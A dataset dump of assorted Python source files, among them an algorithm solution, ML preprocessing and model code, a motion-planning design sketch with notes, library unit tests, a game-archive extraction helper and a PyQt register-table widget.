| id (string, 3–8 chars) | content (string, 100–981k chars) |
|---|---|
11555764
|
class Solution:
    def findDiagonalOrder(self, matrix):
        i, j, d, res, n, m = 0, 0, 1, [], len(matrix), len(matrix and matrix[0])
        while i < n and j < m:
            res.append(matrix[i][j])
            # At the top row heading up (with room to the right) or the bottom row heading down, step right and flip direction.
            if (j + 1 < m and i == 0 and d == 1) or (i == n - 1 and d == -1):
                j, d = j + 1, -d
            # At the left column heading down (with room below) or the right column heading up, step down and flip direction.
            elif (i + 1 < n and j == 0 and d == -1) or (j == m - 1 and d == 1):
                i, d = i + 1, -d
            elif d == 1:
                i, j = i - 1, j + 1
            else:
                i, j = i + 1, j - 1
        return res
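# A quick sanity check (expected diagonal order for a 3x3 input):
# Solution().findDiagonalOrder([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
# -> [1, 2, 4, 7, 5, 3, 6, 9, 8]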
|
11555790
|
import glob
from utils import load_from_file
import numpy as np
import pandas as pd
fnames = glob.glob("/users/mscherbela/runs/jaxtest/conv/test9/*/results.bz2")
all_data = []
for f in fnames:
    data = load_from_file(f)
    d = data['config']
    E_eval_mean = data['E_eval_mean']
    d['Eval_mean_of_std'] = np.mean(data['E_eval_std'])
    # standard deviation of the mean energies, matching the key name
    d['Eval_std_of_mean'] = np.std(E_eval_mean)
    all_data.append(d)
df = pd.DataFrame(all_data)
|
11555816
|
from ir_axioms.model import base, context
# Re-export commonly used classes from the base and context sub-modules.
Query = base.Query
Document = base.Document
TextDocument = base.TextDocument
RankedDocument = base.RankedDocument
RankedTextDocument = base.RankedTextDocument
JudgedRankedDocument = base.JudgedRankedDocument
JudgedRankedTextDocument = base.JudgedRankedTextDocument
IndexContext = context.IndexContext
|
11555818
|
from sqlalchemy.ext.mutable import MutableDict
from sqlalchemy_utils import UUIDType, JSONType
from depc.extensions import db
from depc.models import BaseModel
class Config(BaseModel):
    __tablename__ = "configs"
    __repr_fields__ = ("id", "team")
    team_id = db.Column(
        UUIDType(binary=False), db.ForeignKey("teams.id"), nullable=False
    )
    team = db.relationship("Team", back_populates="configs")
    # Use the dict constructor as the default so rows don't share one mutable dict.
    data = db.Column(MutableDict.as_mutable(JSONType), default=dict, nullable=False)
|
11555845
|
import torch
from torchvision.transforms import autoaugment, transforms
from torchvision.transforms.functional import InterpolationMode
class ClassificationPresetTrain:
def __init__(self, crop_size, image_mean=(123.675, 116.28, 103.53), image_scale=(0.017125, 0.017507, 0.017429), hflip_prob=0.5,
auto_augment_policy=None, random_erase_prob=0.0):
# Note: input is divided by 255 before this mean/std is applied
# Note: can potentially use direct_float in ToTensor and then T.NormalizeMeanScale() to avoid division by 255
float_mean = [m/255.0 for m in image_mean]
float_std = [(1.0/s)/255.0 for s in image_scale]
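# e.g. for the first channel: mean 123.675 with scale 0.017125 gives float_mean ~ 0.485 and float_std ~ 0.229, the familiar ImageNet stats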
trans = [transforms.RandomResizedCrop(crop_size)]
if hflip_prob > 0:
trans.append(transforms.RandomHorizontalFlip(hflip_prob))
if auto_augment_policy is not None:
if auto_augment_policy == "ra":
trans.append(autoaugment.RandAugment())
elif auto_augment_policy == "ta_wide":
trans.append(autoaugment.TrivialAugmentWide())
else:
aa_policy = autoaugment.AutoAugmentPolicy(auto_augment_policy)
trans.append(autoaugment.AutoAugment(policy=aa_policy))
trans.extend([
transforms.PILToTensor(),
transforms.ConvertImageDtype(torch.float),
transforms.Normalize(mean=float_mean, std=float_std),
])
if random_erase_prob > 0:
trans.append(transforms.RandomErasing(p=random_erase_prob))
self.transforms = transforms.Compose(trans)
def __call__(self, img):
return self.transforms(img)
class ClassificationPresetEval:
def __init__(self, crop_size, resize_size=256, image_mean=(123.675, 116.28, 103.53), image_scale=(0.017125, 0.017507, 0.017429),
interpolation=InterpolationMode.BILINEAR):
# Note: input is divided by 255 before this mean/std is applied
# Note: can potentially use direct_float in ToTensor and then T.NormalizeMeanScale() to avoid division by 255
float_mean = [m/255.0 for m in image_mean]
float_std = [(1.0/s)/255.0 for s in image_scale]
self.transforms = transforms.Compose([
transforms.Resize(resize_size, interpolation=interpolation),
transforms.CenterCrop(crop_size),
transforms.PILToTensor(),
transforms.ConvertImageDtype(torch.float),
transforms.Normalize(mean=float_mean, std=float_std),
])
def __call__(self, img):
return self.transforms(img)
|
11555899
|
import random
# Ok, I think what we have below is correct as pseudo-code.
# Next: test it with a simple environment and make it no-longer pseudo-code
# After that: make it into a persistent thing that I can make multiple calls to.
'''
A snag:
I need some way of figuring out whether a node has already been explored. Currently these nodes can be anything. Ideally they would be something hashable so I can put them in a set or a dictionary, or even just use them as edge coordinates without using the more cumbersome integer ids to stand in for them in the set of edges.
Options:
1. Follow through: make the nodes be hashable and just do this.
2. Make an additional function (which must be passed in) that returns a unique id that can be used... but this is basically just the hash function.
What I'm going to do for now:
Follow through, make everything be hashable (can go in a set, etc.) then revise if that becomes unfeasible later.
'''
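# A small sketch of option 1 (the states shown here are hypothetical): if nodes
# are plain tuples of hashables they drop straight into sets and dicts, so no
# stand-in integer ids are needed for the edge set.
def _hashable_node_sketch():
    state_a = ('brick_3', (0, 1, 0))
    state_b = ('brick_3', (0, 2, 0))
    explored = {state_a}
    edges = {(state_a, state_b): 1.0}
    return state_b in explored, edges[state_a, state_b]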
'''
A few thoughts:
There are two components here:
One thing that grows this graph and another thing that tries to find a path through that graph from start to goal. Both need similar, but slightly different structures. The graph can be shared for all time (i.e. by multiple calls to plan for the same target configuration). The path finder is specific to the start and goal.
The basic idea is to grow the graph until you can find a path through it from the start to the goal that is "good enough." How do you know when to check if you have a path from start to goal? At the moment, it seems like you can do this every time you make a connection back to the graph. But there's a better thing here I think. If you keep track of what nodes are reachable from the current start, then you can only check once you hit a previously unreachable node. That's not bad.
'''
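# A minimal sketch of the reachability bookkeeping described above (names are
# illustrative): only re-run the start-to-goal search when a new connection
# touches a node that was not previously reachable.
def _should_replan(new_edge, reachable_nodes):
    source, destination = new_edge
    return source in reachable_nodes and destination not in reachable_nodes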
'''
Another issue (perhaps for later):
Also, how do I do the backward search that lets me avoid camera motion? Right now this is all forward.
'''
'''
Tangles:
What is the interface that I want to provide to the gentle user of this function for any reasonable version of this?
So first off, we need an env.
My idea from earlier this morning is that each component should provide get_state and set_state (which should return an observation) methods that allow us to jump around to different states and do backtracking, etc. The combined state is then a good thing to use as a node identifier.
My idea from later this evening was to impose some kind of structure on this whole thing and use the fact that we are always adding or removing bricks that correspond to some target. In that way, each state would basically be a bit-vector for whether or not a certain target node has a corresponding node in the scene, and then another bit vector if we want to allow non-target nodes to show up when an agent makes mistakes. This is nice because it gives us a natural distance metric to use when planning (Hamming distance).
The problem with the first thing is that it makes it hard to use certain nice heuristics, like assembly via disassembly.
The problem with the second thing is it's more limited and doesn't have variables for things like camera motion. So out the window it goes maybe?
The problem with throwing it out is that this assembly via disassembly is probably pretty powerful, and without it, it will take a lot more work to make sure we don't move the camera too much.
The second problem with it though is that we now have to figure out a way to translate whatever our different state space is to this bit vector, which becomes something we either have to make as some super-generic component of the env (which doesn't really make sense, because the env can cover spaces that don't have a specific target) or make that conversion another thing the user has to specify. What are we to do?
So conceptually, it would be really nice to be able to use whatever configuration space we want, but doing so gets rid of some powerful heuristics.
So what else must the user provide? Honestly, it would be nice if the answer was "a start, a goal and not much else." But then I realize that I have these functions that I've been treating as arguments: neighbor_fn and check_edge_fn. These are two new things that must be supplied by the gentle user, and they are not trivial at all. In the case of the reassembly planner, the neighbor_fn is:
def neighbor_fn(env, state, target):
    obs = env.set_state(state)
    current_instances = get_instances_from_obs()
    match(current_instances, target)
    if misplaced_current_instances:
        return remove_ops_for_misplaced_current_instances
    elif unplaced_target_instances:
        return add_ops_for_target_graph_neighbors
    else:
        return []
But here we find another tangle: if our state space is this convoluted thing we get directly from the environment, how do we know what the neighbors will be or what high-level actions we can reason about? I mean, yeah I guess we can just hard-code it, and make our gentle user specify it in whatever implements remove_ops_for_misplaced_current_instances. This gets back to the fact that somebody real, either us or the gentle user, is going to need to do some translating from the goofy, complicated state space output by the environment to a clean, precise, hashable node that can be added to a python set or dictionary and tested for equality with other nodes.
What to do what to do?
Is there a different route to take? Looking further afield, we could go to the bit-vector approach, and make everything else (cameras) part of the transition space between nodes. The problem with this is that we'd then have to track this as we trace a path through high-level nodes.
What if we just tried to plan directly in the super-crazy-pants space? Skip the high-level/low-level thing and just do all planning in the low-level space. This seems pretty hard though. Maybe possible with crazy heuristics? I mean that's kind of what my last attempt was/is right? And that has been kind of a disaster. Why? There's still some business to clear up there about viewpoints and other things. What a mess.
Ok, so how can we make the high-level/low-level search work? And make it general enough to use for multiple action spaces? This thing really is about adding and removing nodes, so maybe we do the bit-vector thing with a... no no no. We need the camera in there too. So the neighbor function is going to return camera motions as well? Yikes. Is this where some heuristic comes in to compensate for the blow-up in graph degree? Guess so.
We're also going to need something that can get us from point a to point b using low-level actions. I guess we know how to do this, the last few attempts at this all do something similar, but the last few attempts have also been all this crazy specific mess. I guess this is kind of fine if it gets me there, BUT I thought cleaning up that mess was part of what this attempt was all about, and it's kind of disappointing to throw away generality again (or require the gentle user to implement so so much).
As a thought exercise, let's pull this together from the bottom up. At the lowest level, our action space is all the pixels in the screen plus a dozen or so extra levers.
From here we can consolidate all the pixels into a varying number of discrete regions that all do the same thing. This takes us from ~256x256 to probably a few hundred discrete snap points. A few hundred is still really big. We could reduce this still if we group those few hundred into a slightly smaller functionally equivalent class, where all the snaps that result in the same next pose get grouped together. This may help a little bit, but not as much as we need. Is this getting us anywhere?
One thought: we can make the low-level planner be another instantiation of the high-level planner. Fancy fancy. In this case, the check_edge function would do nothing because all the edges are already correctly connected to each other. Would be kinda cool if it worked.
Ok no more tangles.
'''
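# Sketch of the bit-vector idea from the notes above (hypothetical encoding):
# one bit per target brick for "present in the scene", with Hamming distance
# as the planning heuristic.
def _hamming_distance(state_a, state_b):
    return sum(a != b for a, b in zip(state_a, state_b))
# e.g. _hamming_distance((1, 0, 1, 0), (1, 1, 1, 1)) == 2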
'''
High Level:
env: gym environment
nodes: states
edges: lazily evaluated low-level state-action-state paths
neighbor_fn: [manually specified] add-remove bricks plus camera actions
check_edge_fn: low-level planner
Low Level:
env: gym environment (shared with high-level)
nodes: states
edges: actions
neighbor_fn:
Yo wait wait wait... what if we added a new action space that lets us find high-level neighbors automatically based on the target. Yeah I like that a lot. This is only in the training environment, so the agent can't actually use it, but it can be used for supervision. We could even do this for the low-level environment too. The purpose of it is just to specify the structure of the graph for planning at that particular level. We could even take this some levels deeper by making the low-level planner operate in symbolic snap space and defer that plan to a low-low-level (basement-level) planner that picks out pixel coordinates and shit. Eew man, that's nasty. Maybe good nasty. Maybe bad nasty. Won't know until the morning.
How does all this make the planning more general and easy to use?
Oh one more thing, if we do the center-viewport-to-snap thing I've been mulling over in my head, then the number of camera actions is really big yo. This is kind of similar to the issues I'm having with everything else though. It seems like I need a special heuristic kind of thing to tell me which ones of these to consider.
'''
'''
There is another argument to make here: just forget all this fancy general nonsense and make one thing that works for reassembly. Oof. Just fuggin do it, you know? Is this the right thing? Don't mull it over. Lay it out. Let's start laying this out, enough meandering.
'''
class GraphSearch:
    def __init__(self, road_map):
        self.road_map = road_map

class RoadMap:
    def __init__(
        self,
        env,
        neighbor_fn,
        check_edge_fn,
    ):
        self.env = env
        self.nodes = set()
        self.edges = {}
        # TODO: make these members, and make the user subclass RoadMap?
        self.neighbor_fn = neighbor_fn
        self.check_edge_fn = check_edge_fn

    def plan(self, start, goal, max_cost=float('inf')):
        while True:
            path, cost = self.graph_search(start, goal, max_cost=max_cost)
            if path is not None:
                return path, cost
            new_nodes = self.expand_graph()
            if not new_nodes:
                raise Exception('unable to expand the road map any further')

    def graph_search(self, start, goal, max_cost=float('inf')):
        # unfinished sketch of the in-place search
        precursors = {}
        frontier = [(0, start)]
def plan(
    env,
    start,
    goal,
    neighbor_fn,
    check_edge_fn,
    max_cost=float('inf'),
):
    nodes = {goal}
    edges = {}
    # initialize the frontier
    frontier = [(None, start)]
    reachable_nodes = {start}

    def pick_from_frontier():
        # prefer edges that connect back to the known graph, and remove
        # whatever we pick so it isn't considered twice
        connected_edges = [
            (a, b) for (a, b) in frontier if b in nodes]
        if connected_edges:
            choice = random.choice(connected_edges)
        else:
            choice = random.choice(frontier)
        frontier.remove(choice)
        return choice

    while frontier:
        source, destination = pick_from_frontier()
        nodes.add(destination)
        if source is not None:
            edges[source, destination] = float('inf'), None
        if destination not in reachable_nodes:
            # this should be an in-place A* update or something
            path = graph_search(start, goal, nodes, edges)
            if path is not None:
                path_steps = []
                path_cost = 0.
                for s, d in path:
                    edge_cost, edge_steps = edges[s, d]
                    if edge_steps is None:
                        # lazily evaluate the edge the first time a path crosses it
                        edge_cost, edge_steps = check_edge_fn(env, s, d)
                        edges[s, d] = edge_cost, edge_steps
                    path_steps.extend(edge_steps)
                    path_cost += edge_cost
                    if path_cost >= max_cost:
                        break
                    reachable_nodes.add(d)
                else:
                    return path_steps, path_cost
        neighbors = neighbor_fn(env, destination)
        for neighbor in neighbors:
            frontier.append((destination, neighbor))
    # if we can't find anything, return an empty sequence with infinite cost
    return [], float('inf')
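# The free function graph_search used by plan() above is left unimplemented in
# these notes; the following is a minimal Dijkstra sketch under an assumed
# interface (returns a list of (source, destination) pairs from start to goal,
# or None when no path exists). Unevaluated edges (steps of None) are treated
# optimistically as free so that lazy evaluation can fill them in later.
import heapq

def graph_search(start, goal, nodes, edges):
    # 'nodes' is accepted for interface parity; the search runs over 'edges'
    best = {start: 0.}
    precursors = {}
    counter = 0
    queue = [(0., counter, start)]
    while queue:
        cost, _, node = heapq.heappop(queue)
        if cost > best.get(node, float('inf')):
            continue  # stale queue entry
        if node == goal:
            path = []
            while node != start:
                path.append((precursors[node], node))
                node = precursors[node]
            return path[::-1]
        for (s, d), (edge_cost, edge_steps) in edges.items():
            if s != node:
                continue
            step = 0. if edge_steps is None else edge_cost
            if cost + step < best.get(d, float('inf')):
                best[d] = cost + step
                precursors[d] = s
                counter += 1
                heapq.heappush(queue, (cost + step, counter, d))
    return None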
def test_plan():
    '''
          d
         x \
        b---c
         \ x
          a
    '''
    nodes = set('abcd')
    start = 'a'
    goal = 'b'

    def neighbor_fn(env, node):
        if node == 'a':
            return 'b', 'c'
        elif node == 'b':
            return 'c', 'd'
        elif node == 'c':
            return 'b', 'd'
        elif node == 'd':
            return ()

    def check_fn(env, s, d):
        if s == 'a' and d == 'b':
            return 0., ['ab.1', 'ab.2']
        elif s == 'a' and d == 'c':
            return float('inf'), []
        elif s == 'b' and d == 'd':
            return float('inf'), []
        elif s == 'b' and d == 'c':
            return 0., ['bc.1', 'bc.2']
        elif s == 'c' and d == 'b':
            return 0., ['cb.1', 'cb.2']
        elif s == 'c' and d == 'd':
            return 0., ['cd.1', 'cd.2']
        # any edge not listed above is blocked
        return float('inf'), []

    plan(None, 'a', 'b', neighbor_fn, check_fn)

if __name__ == '__main__':
    test_plan()
|
11555907
|
import torch
from torch import nn
from transformers import AlbertModel
class MME2E_T(nn.Module):
def __init__(self, feature_dim, num_classes=4, size='base'):
super(MME2E_T, self).__init__()
self.albert = AlbertModel.from_pretrained(f'albert-{size}-v2')
# self.text_feature_affine = nn.Sequential(
# nn.Linear(768, 512),
# nn.ReLU(),
# nn.Linear(512, feature_dim)
# )
def forward(self, text, get_cls=False):
# logits, hidden_states = self.albert(**text, output_hidden_states=True)
last_hidden_state, _ = self.albert(**text)
if get_cls:
cls_feature = last_hidden_state[:, 0]
# cls_feature = self.text_feature_affine(cls_feature)
return cls_feature
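# NOTE: text_feature_affine is commented out above, so this branch would raise AttributeError as written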
text_features = self.text_feature_affine(last_hidden_state).sum(1)
return text_features
|
11555928
|
import FWCore.ParameterSet.Config as cms
from IOMC.EventVertexGenerators.VtxSmearedParameters_cfi import *
matchVtx = cms.EDProducer("MixEvtVtxGenerator",
signalLabel = cms.InputTag("hiSignal"),
heavyIonLabel = cms.InputTag("generator","unsmeared")
)
|
11555961
|
import threading, unittest
from bibliopixel.util.threads import compose_events
class ComposeEventTest(unittest.TestCase):
    def test_compose_events(self):
        a, b = threading.Event(), threading.Event()
        master = compose_events.compose_events([a, b])
        self.assertFalse(master.is_set())
        a.set()
        self.assertFalse(master.is_set())
        b.set()
        self.assertTrue(master.is_set())
        a.clear()
        self.assertFalse(master.is_set())
        b.clear()
        self.assertFalse(master.is_set())
        b.set()
        self.assertFalse(master.is_set())
        a.set()
        self.assertTrue(master.is_set())
|
11556030
|
import pickle
import shutil
import unittest
import platform
import subprocess
from pathlib import Path
from autodrome.simulator import Simulator, ETS2, ATS
from .map import Map
from .definition import Definition
class Policeman:
ExtractorExecutable = Path(__file__).parent / 'bin/scs_extractor.exe'
def __init__(self, simulator: Simulator):
self.simulator = simulator
self.world = self.setup_world(overwrite=False)
self.map = self.setup_map()
self.plot = None
def setup_world(self, overwrite: bool=False) -> Definition:
""" Extract ETS2/ATS archives to an intermediate cache for parsing """
extractor = self.simulator.RootGameFolder / 'scs_extractor.exe'
shutil.copy(self.ExtractorExecutable, extractor)
cache_dir = self.simulator.mod_dir / 'cache'
cache_dir.mkdir(parents=True, exist_ok=True)
print(f"Setting up extracted game archives cache in '{cache_dir}'...")
for archive in ['def']: # It looks like base.scs and others are not needed
if (cache_dir / archive).exists() and not overwrite:
print(f"Skipping '{self.simulator.RootGameFolder / archive}.scs' ...")
continue
print(f"Extracting '{self.simulator.RootGameFolder / archive}.scs' (This takes a few minutes)...")
if platform.system() == 'Windows':
extract_command = [str(extractor), archive + '.scs', str(cache_dir)]
else:
extract_command = ['wineconsole', str(extractor), archive + '.scs', str(cache_dir)]
subprocess.check_call(extract_command, cwd=self.simulator.RootGameFolder)
extractor.unlink()
if (cache_dir / 'world.pkl').exists():
with open(cache_dir / 'world.pkl', 'rb') as world_pkl:
world = pickle.load(world_pkl)
else:
world = Definition(cache_dir / 'def/world', recursive=True)
with open(cache_dir / 'world.pkl', 'wb') as world_pkl:
pickle.dump(world, world_pkl)
return world
def setup_map(self) -> Map:
""" Open and parse ETS2/ATS text map file """
map = Map(self.simulator.mod_dir / 'map/indy500.txt')
return map
# region Unit Tests
class TestPoliceman(unittest.TestCase):
@unittest.skipUnless(ETS2.RootGameFolder.exists(), "ETS2 not installed")
def test_ets2(self):
with ETS2() as ets2:
policeman = Policeman(ets2)
@unittest.skipUnless(ATS.RootGameFolder.exists(), "ATS not installed")
def test_ats(self):
with ATS() as ats:
policeman = Policeman(ats)
# endregion
|
11556043
|
import sys
import unittest
from targetprologstandalone import entry_point
from StringIO import StringIO
class TestSpyrolog(unittest.TestCase):
def test_direct(self):
stdout_bak = sys.stdout
try:
result = StringIO()
sys.stdout = result
entry_point([
'',
'data/direct_facts.txt',
'data/direct_sims.txt',
#'s0(e0,e1).|s0(e2,e1).|s0(e3,e1).|s0(e4,e1).|s0(e5,e1).|s0(e6,e1).|s0(e1,e0).|s0(e1,e2).|s0(e1,e3).|s0(e1,e4).|s0(e1,e5).|s0(e1,e6).',
's0(e1,e3).',
'3',
'0',
'prod|prod',
'0'
])
result = result.getvalue().strip()
print "result", result
self.assertIn('0.5', result)
finally:
sys.stdout = stdout_bak
if __name__ == '__main__':
unittest.main()
|
11556095
|
import pytest
from mfsetup.mf5to6 import (
get_package_name,
get_variable_name,
get_variable_package_name,
)
@pytest.mark.parametrize('version_var_expected', [('mfnwt', 'k', 'hk'),
('mfnwt', 'k33', 'vka'),
('mfnwt', 'botm', 'botm'),
('mfnwt', 'idomain', 'ibound'),
('mf6', 'hk', 'k'),
('mf6', 'vka', 'k33'),
('mf6', 'ibound', 'idomain'),
('mf6', 'botm', 'botm'),
])
def test_get_variable_name(version_var_expected):
model_version, var, expected = version_var_expected
result = get_variable_name(var, model_version)
assert result == expected
@pytest.mark.parametrize('version_var_default_expected',
[('mfnwt', 'idomain', 'dis', 'bas6'),
('mfnwt', 'strt', 'ic', 'bas6'),
('mfnwt', 'botm', 'dis', 'dis'),
('mfnwt', 'sy', 'npf', 'upw'),
('mfnwt', 'ss', 'npf', 'upw'),
('mfnwt', 'k', 'npf', 'upw'),
('mfnwt', 'k33', 'npf', 'upw'),
('mf6', 'ibound', 'bas6', 'dis'),
('mf6', 'strt', 'bas6', 'ic'),
('mf6', 'sy', 'upw', 'sto'),
('mf6', 'ss', None, 'sto'),
('mf6', 'hk', 'upw', 'npf'),
('mf6', 'vka', None, 'npf'),
('mf2005', 'botm', 'dis', 'dis'),
('mf2005', 'sy', 'upw', 'lpf'),
('mf2005', 'ss', 'npf', 'lpf'),
('mf2005', 'k', None, 'lpf'),
('mf2005', 'k33', 'npf', 'lpf'),
])
def test_get_variable_package_name(version_var_default_expected):
model_version, var, default, expected = version_var_default_expected
result = get_variable_package_name(var, model_version, default)
assert result == expected
@pytest.mark.parametrize('version_package_expected',
[('mfnwt', 'npf', {'upw'}),
('mfnwt', 'sto', {'upw'}),
('mfnwt', 'ic', {'bas6'}),
('mfnwt', 'dis', {'dis', 'bas6'}),
('mfnwt', 'tdis', {'dis'}),
('mfnwt', 'oc', {'oc'}),
('mf6', 'dis', {'dis', 'tdis'}),
('mf6', 'upw', {'npf', 'sto'}),
('mf6', 'lpf', {'npf', 'sto'}),
('mf6', 'bas6', {'ic', 'dis'}),
('mf6', 'oc', {'oc'}),
('mf2005', 'npf', {'lpf'}),
('mf2005', 'sto', {'lpf'}),
('mf2005', 'ic', {'bas6'}),
('mf2005', 'dis', {'dis', 'bas6'}),
('mf2005', 'tdis', {'dis'}),
])
def test_get_package_name(version_package_expected):
model_version, package, expected = version_package_expected
result = get_package_name(package, model_version)
assert result == expected
|
11556120
|
import string
from PyQt5.QtWidgets import QTableWidget, QTableWidgetItem, QMenu, QAction
from PyQt5.QtCore import Qt, pyqtSignal
from PyQt5.QtGui import QColor, QCursor
from core import prefs
class RegTableWidget(QTableWidget):
regCheckBoxChanged = pyqtSignal(str, int)
def __init__(self, parent=None):
super(RegTableWidget, self).__init__(parent)
self.printer = print
self.regs = {}
self.modified_regs = []
self.modified_regs_ignore = ["eip", "rip"]
self.filtered_regs = []
self.checked_regs = {}
self.menu = None
if prefs.USE_DARK_THEME:
self.hl_color = QColor("darkRed")
else:
self.hl_color = QColor("#fcabab")
def create_context_menu(self):
"""Initializes context menu for mouse right click"""
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(self.on_custom_context_menu_requested)
self.menu = QMenu(self)
print_action = QAction("Print selected cells", self)
print_action.triggered.connect(self.print_selected_cells)
self.menu.addAction(print_action)
def onCellChanged(self, row, col):
if col > 0:
return
item = self.item(row, 0)
state = item.checkState()
state_bool = state == Qt.Checked
reg_name = item.text()
self.checked_regs[reg_name] = state
self.regCheckBoxChanged.emit(reg_name, state_bool)
def on_custom_context_menu_requested(self):
"""Context menu callback for mouse right click"""
if self.menu is not None:
self.menu.popup(QCursor.pos())
def set_data(self, regs, modified_regs):
"""Sets table data and populates the table"""
if self.filtered_regs:
temp_regs = {}
for reg, value in regs.items():
if reg in self.filtered_regs:
temp_regs[reg] = value
regs = temp_regs
self.regs = regs
self.modified_regs = modified_regs
self.populate()
def populate(self):
"""Populates the register table"""
try:
self.cellChanged.disconnect()
except Exception:
pass
if self.rowCount() != len(self.regs):
self.setRowCount(len(self.regs))
if not self.regs:
return
i = 0
for reg, value in self.regs.items():
if self.filtered_regs and reg not in self.filtered_regs:
continue
regname_item = QTableWidgetItem(reg)
regname_item.setFlags(
Qt.ItemIsUserCheckable | Qt.ItemIsEnabled | Qt.ItemIsSelectable
)
check_state = self.checked_regs.get(reg, Qt.Unchecked)
regname_item.setCheckState(check_state)
self.setItem(i, 0, regname_item)
if isinstance(value, int):
hex_str = hex(value)
if 0 < value < 255 and chr(value) in string.printable:
hex_str += f" '{chr(value)}'"
hex_item = QTableWidgetItem(hex_str)
hex_item.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
dec_item = QTableWidgetItem(str(value))
dec_item.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
self.setItem(i, 1, hex_item)
self.setItem(i, 2, dec_item)
else:
self.setItem(i, 1, QTableWidgetItem(value))
if reg in self.modified_regs and reg not in self.modified_regs_ignore:
self.item(i, 0).setBackground(self.hl_color)
self.item(i, 1).setBackground(self.hl_color)
self.item(i, 2).setBackground(self.hl_color)
i += 1
if "eflags" in self.regs:
eflags = self.regs["eflags"]
flags = {
"c": eflags & 1, # carry
"p": (eflags >> 2) & 1, # parity
# "a": (eflags >> 4) & 1, # aux_carry
"z": (eflags >> 6) & 1, # zero
"s": (eflags >> 7) & 1, # sign
# "d": (eflags >> 10) & 1, # direction
# "o": (eflags >> 11) & 1 # overflow
}
flags_text = f"C:{flags['c']} P:{flags['p']} Z:{flags['z']} S:{flags['s']}"
self.setRowCount(i + 1)
self.setItem(i, 0, QTableWidgetItem("flags"))
self.setItem(i, 1, QTableWidgetItem(flags_text))
self.cellChanged.connect(self.onCellChanged)
def print(self, msg: str):
if self.printer:
self.printer(msg)
else:
print(msg)
def print_selected_cells(self):
"""Prints selected cells"""
items = self.selectedItems()
if len(items) < 1:
return
rows = {}
for item in items:
row = item.row()
if row not in rows:
rows[row] = [item.text()]
else:
rows[row].append(item.text())
for row in rows.values():
self.print(" ".join(row))
|
11556170
|
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.electric_load_center import GeneratorFuelCellExhaustGasToWaterHeatExchanger
log = logging.getLogger(__name__)
class TestGeneratorFuelCellExhaustGasToWaterHeatExchanger(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_generatorfuelcellexhaustgastowaterheatexchanger(self):
pyidf.validation_level = ValidationLevel.error
obj = GeneratorFuelCellExhaustGasToWaterHeatExchanger()
# alpha
var_name = "Name"
obj.name = var_name
# node
var_heat_recovery_water_inlet_node_name = "node|Heat Recovery Water Inlet Node Name"
obj.heat_recovery_water_inlet_node_name = var_heat_recovery_water_inlet_node_name
# node
var_heat_recovery_water_outlet_node_name = "node|Heat Recovery Water Outlet Node Name"
obj.heat_recovery_water_outlet_node_name = var_heat_recovery_water_outlet_node_name
# real
var_heat_recovery_water_maximum_flow_rate = 4.4
obj.heat_recovery_water_maximum_flow_rate = var_heat_recovery_water_maximum_flow_rate
# node
var_exhaust_outlet_air_node_name = "node|Exhaust Outlet Air Node Name"
obj.exhaust_outlet_air_node_name = var_exhaust_outlet_air_node_name
# alpha
var_heat_exchanger_calculation_method = "FixedEffectiveness"
obj.heat_exchanger_calculation_method = var_heat_exchanger_calculation_method
# real
var_method_1_heat_exchanger_effectiveness = 7.7
obj.method_1_heat_exchanger_effectiveness = var_method_1_heat_exchanger_effectiveness
# real
var_method_2_parameter_hxs0 = 8.8
obj.method_2_parameter_hxs0 = var_method_2_parameter_hxs0
# real
var_method_2_parameter_hxs1 = 9.9
obj.method_2_parameter_hxs1 = var_method_2_parameter_hxs1
# real
var_method_2_parameter_hxs2 = 10.1
obj.method_2_parameter_hxs2 = var_method_2_parameter_hxs2
# real
var_method_2_parameter_hxs3 = 11.11
obj.method_2_parameter_hxs3 = var_method_2_parameter_hxs3
# real
var_method_2_parameter_hxs4 = 12.12
obj.method_2_parameter_hxs4 = var_method_2_parameter_hxs4
# real
var_method_3_h0gas_coefficient = 13.13
obj.method_3_h0gas_coefficient = var_method_3_h0gas_coefficient
# real
var_method_3_ndotgasref_coefficient = 14.14
obj.method_3_ndotgasref_coefficient = var_method_3_ndotgasref_coefficient
# real
var_method_3_n_coefficient = 15.15
obj.method_3_n_coefficient = var_method_3_n_coefficient
# real
var_method_3_gas_area = 16.16
obj.method_3_gas_area = var_method_3_gas_area
# real
var_method_3_h0_water_coefficient = 17.17
obj.method_3_h0_water_coefficient = var_method_3_h0_water_coefficient
# real
var_method_3_n_dot_water_ref_coefficient = 18.18
obj.method_3_n_dot_water_ref_coefficient = var_method_3_n_dot_water_ref_coefficient
# real
var_method_3_m_coefficient = 19.19
obj.method_3_m_coefficient = var_method_3_m_coefficient
# real
var_method_3_water_area = 20.2
obj.method_3_water_area = var_method_3_water_area
# real
var_method_3_f_adjustment_factor = 21.21
obj.method_3_f_adjustment_factor = var_method_3_f_adjustment_factor
# real
var_method_4_hxl1_coefficient = 22.22
obj.method_4_hxl1_coefficient = var_method_4_hxl1_coefficient
# real
var_method_4_hxl2_coefficient = 23.23
obj.method_4_hxl2_coefficient = var_method_4_hxl2_coefficient
# real
var_method_4_condensation_threshold = 24.24
obj.method_4_condensation_threshold = var_method_4_condensation_threshold
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].name, var_name)
self.assertEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].heat_recovery_water_inlet_node_name, var_heat_recovery_water_inlet_node_name)
self.assertEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].heat_recovery_water_outlet_node_name, var_heat_recovery_water_outlet_node_name)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].heat_recovery_water_maximum_flow_rate, var_heat_recovery_water_maximum_flow_rate)
self.assertEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].exhaust_outlet_air_node_name, var_exhaust_outlet_air_node_name)
self.assertEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].heat_exchanger_calculation_method, var_heat_exchanger_calculation_method)
